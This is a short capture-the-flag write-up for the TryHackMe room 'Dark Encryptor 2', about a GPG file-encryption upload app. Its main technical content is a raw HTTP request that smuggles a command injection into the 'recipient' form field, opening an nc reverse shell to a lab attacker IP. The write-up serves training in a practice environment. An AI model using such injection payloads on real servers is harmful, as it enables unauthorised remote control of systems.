TryHackMe Dark Encryptor 2 Hackfinity Battle Write-Up Walk Through
After pivoting through their internal network, we have found yet another encryption tool. Can you hack into the server and extract the secret data? Our intel tells us that the app is using the gpg tool.
Exploring TryHackMe’s Dark Encryptor 2: A File Upload Adventure
Recently, I tackled the “Dark Encryptor 2” room on TryHackMe, and it was a blast! This challenge dives into a file upload scenario where you’re tasked with outsmarting an application that encrypts your files using GPG. What starts as a simple upload turns into a hunt for a cleverly hidden vulnerability—one that ties back to lessons from its predecessor room.
You can follow YouTube video walk through here
The Setup
The room presents an app with a file upload feature, complete with an extension filter and an encryption type dropdown. Upload a file like test.txt, and you get back an encrypted version (e.g., random_name.gpg). The catch? There’s a way to make the app spill its secrets—specifically, the flag—by exploiting how it handles your input.
The Twist
You can also get reverse shell, bellow Burp suite setup
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST / HTTP/1.1
Host: 10.10.205.208:5000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------8260033711009175319198161817
Content-Length: 422
Origin: http://10.10.205.208:5000
Connection: keep-alive
Referer: http://10.10.205.208:5000/
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------8260033711009175319198161817
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
test
-----------------------------8260033711009175319198161817
Content-Disposition: form-data; name="recipient"
Cipher ;$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.248.189 9001 >/tmp/f)
-----------------------------8260033711009175319198161817--
Want the Full Walkthrough?
Check out my full video walkthrough on my YouTube channel for step-by-step guidance:
You can follow YouTube video walk through here
